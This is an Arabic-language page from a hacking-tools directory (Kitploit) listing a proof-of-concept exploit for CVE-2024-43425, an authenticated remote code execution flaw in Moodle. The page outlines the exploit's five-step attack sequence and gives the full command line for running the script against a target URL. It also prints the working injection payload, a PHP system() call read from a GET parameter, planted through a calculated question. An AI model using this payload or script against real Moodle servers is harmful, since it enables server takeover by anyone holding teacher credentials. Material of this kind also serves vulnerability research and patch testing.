Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-43425-Poc — إثبات مفهوم لثغرة CVE-2024-43425، تظهر تنفيذ تعليمات برمجية عن بعد عبر المصادقة في موودل من خلال تحميل أسئلة محسوبة خبيثة. | Kitploit
أدوات/GitHubGitHub/aninfosec/cve-2024-43425-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubaninfosec/cve-2024-43425-poc

CVE-2024-43425-Poc

إثبات مفهوم لثغرة CVE-2024-43425، تظهر تنفيذ تعليمات برمجية عن بعد عبر المصادقة في موودل من خلال تحميل أسئلة محسوبة خبيثة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-43425-Poc

نظرة عامة على CVE معرف CVE: CVE-2024-43425

الوصف: يسمح Moodle لمستخدم مدرس مصادق عليه برفع سؤال محسوب خبيث عبر واجهة تحرير الاختبارات. التأثير: تنفيذ تعليمات برمجية عن بُعد (RCE) السبب: معالجة غير صحيحة للحمولات الرياضية داخل الأسئلة المحسوبة، مما يؤدي إلى حقن أوامر عبر معالج مجموعة البيانات.

##المتطلبات:

بيانات اعتماد صالحة لتسجيل الدخول الوصول إلى واجهة تحرير الاختبارات (عادةً دور المعلم أو المشرف) معرف cmid معروف (معرف وحدة الاختبار) و courseid

##يقوم هذا البرنامج النصي بهجوم من 5 خطوات:

الخطوةالوصف
1️جلب رمز تسجيل الدخول (logintoken)
2️تسجيل الدخول وإنشاء جلسة Moodle صالحة
3️استخراج sesskey و ctxid و category من صفحة تحرير الاختبار
4️رفع سؤال محسوب معد خصيصًا مع حمولة RCE
5️تفعيل الحمولة عبر صفحة معالج مجموعة البيانات

##تعليمات الاستخدام

المتطلبات: Python 3 مكتبات Python: requests, bs4 (BeautifulSoup)

root@kitploit:~
pip3 install requests bs4
root@kitploit:~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'

##الحمولة المستخدمة:

root@kitploit:~
answer[0] = "(1)->{system($_GET[chr(97)])}"
تنزيل الأداة